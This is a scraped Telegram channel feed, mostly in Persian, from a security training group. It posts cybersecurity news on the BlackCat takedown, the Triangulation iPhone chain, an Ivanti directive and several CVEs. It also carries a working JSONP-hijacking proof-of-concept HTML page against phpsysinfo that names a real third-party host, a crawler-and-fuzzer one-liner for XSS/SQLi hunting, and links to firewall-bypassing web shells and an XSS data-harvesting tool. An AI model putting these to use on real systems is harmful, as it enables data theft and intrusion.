KASRAONE
1.03K subscribers
135 photos
6 videos
14 files
252 links
...................﷽........................
🐞باگ‌ها را شکار کنیم، کد را بهتر کنیم👨‍💻
برگزاری دوره‌های برنامه نویسی و امنیت
سایبری

آدرس سایت 🌐
kasraone.ir
تلفن☎️:
۰۵۱۴-۳۲۲۴۱۶۸
آیدی پشتیبان
🆔️ : @academykasraone

آدرس گروه کسری وان

🌐 : @kasraonegap
Download Telegram
KASRAONE
Photo
🔴 باج افزاره گربه سیاه

اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد

وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.

اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.

BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.

اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.



LINK

https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1

                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
شب یلدا به همه دوستان و کاربران عزیز کسری وان مبارک

شرکت کسری ارتباط پارس
3
🔴 ترفنده سریع برای درک UDP VS TCP 😁



                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😁6👍2
🔴 Android Penetration  Part 1

MEDIUOM

https://medium.com/p/b82b0d06e360



                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
KASRAONE
Photo
«پیچیده‌ترین» زنجیره حمله آیفون که تا به حال ایجاد شده است - از چهار آسیب‌پذیری روز صفر برای ایجاد یک اکسپلویت با کلیک صفر استفاده می‌کند.

بین سال‌های 2019 و دسامبر 2022، یک آسیب‌پذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آن‌ها آنچه را که درباره «پیچیده‌ترین زنجیره حمله‌ای که تا به حال دیده‌اند» به اشتراک می‌گذارند.

امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیب‌پذیری‌ها و جزئیات آسیب‌پذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا می‌کنند».

محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.

در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیب‌پذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.

• این پیوست از آسیب‌پذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده می‌کند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.

• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.

• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.

• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.

• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.

• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.

• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.

• پس از اینکه تمام آسیب‌پذیری‌ها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت می‌تواند هر کاری را که می‌خواهد با دستگاه انجام دهد، از جمله اجرای نرم‌افزارهای جاسوسی، اما مهاجم تصمیم می‌گیرد: (الف) فرآیند IMAgent را راه‌اندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.

• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.

• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.

• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.

• این آسیب‌پذیری امتیازات ریشه را به دست می‌آورد و به مراحل دیگری که نرم‌افزارهای جاسوسی بارگیری می‌شوند ادامه می‌دهد. در پست قبلی به این مراحل پرداختیم.

LINK

https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/

                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔍 نکات Bounty Bug: خزیدن پارامترها با Katana برای بردهای سریع XSS/SQLI!

🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent

🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش می‌دهد و تشخیص آسیب‌پذیری‌ها و تضمین آن بردهای سریع را آسان‌تر می‌کند.

💡موارد حذفی: استفاده از قابلیت‌های کاتانا می‌تواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
32
🔴 Autorize



Link GitHub 🐈


https://github.com/Quitten/Autorize

Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍1
نیویورک تایمز از OpenAI و مایکروسافت به دلیل نقض حق چاپ شکایت کرده است

نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و می‌گوید این شرکت‌ها اکنون با «کپی کردن و استفاده از میلیون‌ها مقاله» از مقاله‌های این نشریه برای ساخت مدل‌های هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت می‌کنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.

طبق این شکایت، تایمز ادعا می‌کند که مدل‌های زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت می‌کنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار می‌کند، محتوای آن را از نزدیک خلاصه می‌کند و سبک ارائه آن را تقلید می‌کند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.

🔴 ادامه خبر در لینک

LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😁1😍1
(CSRF)



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
KASRAONE
(CSRF)         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣          ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ                         K1                   kasraone
🔴 CVE-2023-49006


آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.

phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.

در اینجا کد HTML برای اثبات فایل مفهومی آمده است:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
5👍2😍1
یک شرکت فرانسوی اولین آینه هوشمند هوش مصنوعی جهان را عرضه کرد: این آینه می تواند احساسات کاربران را شناسایی کند و استرس را از بین ببرد.

در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.

از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.

Link

https://www.ithome.com/0/743/950.htm


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍1😍1
🔴 ezXSS

Git Hub : 🐈


Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)

The following information can be collected on a vulnerable page:

The URL of the page

IP Address
Any page referer (or share referer)


LINKTOOLS




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍2
WebShells

Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )

Git Hub 🐈

https://github.com/sagsooz/Bypass-Webshell


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 Blind SSRF to Port Scanning through response time


LINK MEDIUM




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
🔴 اطلاعات سازمان آمریکایی توست هکرها هک شد ! : American Alarm and

Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانه‌ها و مشاغل در سراسر نیوانگلند محافظت می‌کنیم. شرکت ما با متخصصان متعهد کار می‌کند که در جوامعی که به آنها خدمت می‌کنند زندگی می‌کنند - شاید حتی در همسایگی شما.

سایت: www.americanalarm.com

نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده





        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😱2
🔴 CISA
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند



The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.


The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
3👍1
🔴 CVE

CVE-2023-48382

Softnext Mail SQR Expert

یک پلتفرم مدیریت ایمیل است که دارای یک آسیب‌پذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم  ازراه دور تأیید نشده می‌تواند از این آسیب‌پذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.

LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 Local File Inclusion

(LFI) — Web Application Penetration Testing


MEDIUM


LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
بازی ایران و ژاپن

برد ایران را به تمامی ایرانی های عزیز
کشورمان تبریک میگوییم

2🇮🇷 🇯🇵1
8👍1
🔴 CVE

CVE-2024-0728

LFI

A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍2